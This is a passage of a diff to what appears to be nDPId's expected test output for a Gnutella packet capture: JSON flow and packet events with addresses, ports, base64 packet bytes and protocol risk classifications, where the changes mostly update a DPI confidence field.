{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168840,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":168594,"flow_last_seen":176963,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1959,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":139506,"flow_last_seen":177166,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1954,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00581{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90845,"flow_last_seen":174321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1001,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00566{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90845,"flow_last_seen":174321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1001,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":89016,"flow_last_seen":176659,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4777,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":89016,"flow_last_seen":176659,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4777,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168428,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90138,"flow_last_seen":174723,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90183,"flow_last_seen":174679,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":174303,"flow_last_seen":287509,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1210,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":174342,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":841,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168428,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90138,"flow_last_seen":174723,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90183,"flow_last_seen":174679,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":174303,"flow_last_seen":287509,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1210,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":174342,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":841,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5591,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":371838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":371838,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0taEAAIARR0oKAAIPbYTEOnAJGMoAINecR05EEEABAQFUC1FLUlAGUk5BXS\/iNQlw"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5594,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":371838,"flow_last_seen":371838,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":371838,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.134.107.32","src_port":28681,"dst_port":38836,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5594,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":371838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":371838,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05JUAAIARi24KAAIPU4ZrIHAJl7QAIMvHR05EEEAEAQFUC1FLUlAGUk5BXS\/iNQlw"} @@ -2806,7 +2806,7 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5636,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":2,"flow_last_seen":373497,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":373497,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0mm0AAIARSEgKAAIPQ8EINHAJlrgAID9hR05EEEAYAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5639,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":2,"flow_last_seen":373498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":373498,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0D1EAAIARtk0KAAIPjnPamHAJFwwAIKHzR05EEEAbAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5640,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":3,"flow_last_seen":373498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":373498,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0fvoAAIAR6tsKAAIPmgMq0XAJGMoAIERsR05EEEAcAQFUC1FLUlAGUk5BXS\/iNQlw"} -00781{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00781{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":72852,"flow_last_seen":192908,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.236.247.120","src_port":28681,"dst_port":16047,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":72852,"flow_last_seen":192908,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.236.247.120","src_port":28681,"dst_port":16047,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":192907,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"121.99.222.36","src_port":28681,"dst_port":44988,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -2814,14 +2814,14 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":2,"flow_last_seen":381404,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":381404,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0860AAIARiigKAAIPgS0vp3AJGMoAIFhpR05EEEAfAQFUC1FLUlAGUk5BXS\/iNQlw"} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":399168,"flow_last_seen":399168,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":399168,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":399168,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":399168,"pkt":"UlQAEjUCCAAn5uVZCABFAAA854sAAIAR\/DEKAAIPaJziSHAJ0AoAKHNuYiULNAANuxoAAAAAAAAAADEBAAkAAABHVEtHCQABAAA="} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":399168,"flow_last_seen":399168,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":399168,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":399168,"flow_last_seen":399168,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":399168,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":2,"flow_last_seen":399265,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":399265,"pkt":"CAAn5uVZUlQAEjUCCABFAABEDoMAAEARFTNonOJICgACD9AKcAkAMN2JYiULNAANuxpiJQs1AA5dgzEBABEAAABHVEtHCgABAABiJQs1AA5ddw=="} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400018,"flow_last_seen":400018,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":400018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":400018,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":400018,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LcAAAER3GIKAAIP7\/\/\/+sQlB2wAtikJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400018,"flow_last_seen":400018,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":400018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400018,"flow_last_seen":400018,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":400018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5915,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400872,"flow_last_seen":400872,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":400872,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5915,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":400872,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":400872,"pkt":"UlQAEjUCCAAn5uVZCABFAAA8Bs8AAIAREesKAAIPaO6s+nAJW\/wAKKTOYiULNgAJMscAAAAAAAAAADEBAAkAAABHVEtHCQABAAA="} 